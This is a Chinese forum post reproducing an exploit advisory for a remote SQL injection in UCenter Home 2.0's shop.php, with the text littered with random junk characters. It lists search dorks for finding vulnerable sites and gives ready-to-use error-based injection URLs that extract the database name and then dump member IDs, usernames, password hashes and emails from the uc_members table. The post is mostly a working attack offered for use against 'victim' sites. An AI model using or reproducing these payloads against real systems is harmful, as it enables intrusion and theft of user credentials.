找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2051|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
9 r7 {; ~  `% L- t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
1 `. n1 L3 \9 c7 s! B& m
( ^: Y5 I" p7 _# p! a' X                                 
7 z, y7 m' z3 {# {+ F& S
  F- e# g( s1 n$ d: _' r: T*/ Author : KnocKout  6 U9 l0 G1 Y7 Z6 G1 x# ~+ R

/ V- j8 v0 i: `9 c*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
& `/ B5 o- e) p0 @' N
! U1 o8 f/ J" s2 B- c; u*/ Contact: knockoutr@msn.com  / }/ a: K9 X) K. j" N) {2 u" Z

1 o( E6 Y- t; v2 T- Y; E*/ Cyber-Warrior.org/CWKnocKout  
( v& C6 ?" P% X" U
" I1 b# P; Z; m/ u- S; ]  ]__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  4 o9 \+ x2 Y/ U, l" {( B7 r  M

: F3 a8 v  |0 `& @5 r. I* YScript : UCenter Home  
4 ?- k) F3 Q; n5 P" N0 b2 Z$ Z) o) y! u/ }4 Q
Version : 2.0  
& }. A% E- v& w) S8 h: }" e" n0 @  f$ T+ [! Y5 t" E
Script HomePage : http://u.discuz.net/  , [7 B, Y1 t6 C, y6 ]! r
, R' y2 {# l  I; a9 U: G0 w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 R+ t4 n0 ]+ x3 J
! |; u8 k; S3 J% e. b- H9 @
Dork : Powered by UCenter inurl:shop.php?ac=view  
- N% j) b2 |5 q  b. B7 E; }5 }) O$ W
Dork 2 : inurl:shop.php?ac=view&shopid=  
" \5 d. {9 x; f( |( }, G% \* Q4 o  B# Q& b2 H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ' [+ o  D* X$ W$ B1 `, j; J
% T/ X4 f, ^, h: L, }4 n
Vuln file : Shop.php  
: i: u7 N) }: V3 l4 X" P3 |1 A& T, H7 S/ F
value's : (?)ac=view&shopid=  % o! u, n1 b# b' k2 q+ {% U

- G4 ]8 U+ @: I; I2 u' MVulnerable Style : SQL Injection (MySQL Error Based)  : U. w( I# v% G

% W: ~% u9 o; r/ C4 SNeed Metarials : Hex Conversion  
/ {2 m' b: i' G% f- G
: v, H- {" f; y3 }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 `, v. y% @* H! T
5 k7 K& t4 q, _- G1 m$ [
Your Need victim Database name.   : A6 O' G( o( \- [! C
2 G7 ]! r$ P* M2 D$ O+ t+ e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
0 P0 W- ?+ P4 L, R' t5 T0 H; l% p' K+ p5 h( ?# e
..  
6 O! A+ K& Y! g: G/ ^5 P2 U( h
: {) D& a  t7 p& w2 QDB : Okey.  3 D* K; _8 a/ B- L0 v
3 S" S2 D* h, j  o: t! ]1 _% z! o9 y
your edit DB `[TARGET DB NAME]`  2 `1 [2 E/ c5 I$ g3 o' d8 ~/ d% _1 G$ e

0 v8 T! x+ B' DExample : 'hiwir1_ucenter'  3 X7 H+ f6 S0 _  {' T5 `
" V) v+ Y# G+ ]8 _6 I' _
Edit : Okey.  & l6 J7 Q- d) u% D' X& q

- W+ m) m- L4 h2 u6 ~Your use Hex conversion. And edit Your SQL Injection Exploit..  
& L" z! q& Q  j/ f: k0 M
. x2 ]- h" `! }$ S* R* _   9 ?  @4 _) u9 V, N0 N+ i

8 {- D1 f. H$ h4 l" r& v: lExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
* N5 @$ F: m- n+ w" M4 W6 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表